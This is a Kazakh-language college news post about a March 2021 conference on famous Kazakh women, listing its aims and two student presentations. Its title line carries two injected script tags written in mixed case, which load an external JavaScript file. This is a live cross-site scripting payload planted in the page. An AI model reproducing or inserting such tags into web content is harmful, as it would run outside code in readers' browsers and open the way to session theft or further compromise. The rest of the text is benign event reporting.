«Ұлы даланың танымал әйелдері»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
12.03.2021
11.03.2021 жылы «Ұлы даланың танымал әйелдері» атты Республикалық ғылыми-практикалық конференция болып өтті.
Конференция мақсаты:
- Қазақстанның танымал әйелдерінің өмірі мен қызметі туралы студенттердің білімін көкейтесті ету;
- колледж студенттерін танымал адамдардың өмірі мен қызметін зерттеуге үйрету;
- жауапкершілік, қайырымдылық сияқты қасиеттерге тәрбиелеуге ықпал жасау;
- патриоттық сезім, өз жерлестері үшін мақтаныш сезімдерін қалыптастыруға ықпал ету.
Конференция бағытындағы жұмыс «Томиристен бастап біздің күндерге дейін» (тарихи саяхат) 02-ТҰ-19 тобының 2 курс оқушысы Мищенко Виктория «Мәншүк Мәметованың өмірі мен ерлігі» атты өз жұмысын ұсынды. Ғылыми-практикалық жұмыс жетекшісі Какпетов Мурат Балтабаевич, тарих және география пәні оқытушысы.
01-ТҰ-20 тобының 1 курс оқушысы Полтарацкая Елизавета «Қазақстанның әйгілі спортшылары» тақырыбында «Турсынбаева Элизабет Байтаковна» атты жұмысын ұсынды. Ғылыми-практикалық жұмыс жетекшісі Болтаев Марат Кешаевич, дене тәрбиесі пәні оқытушысы.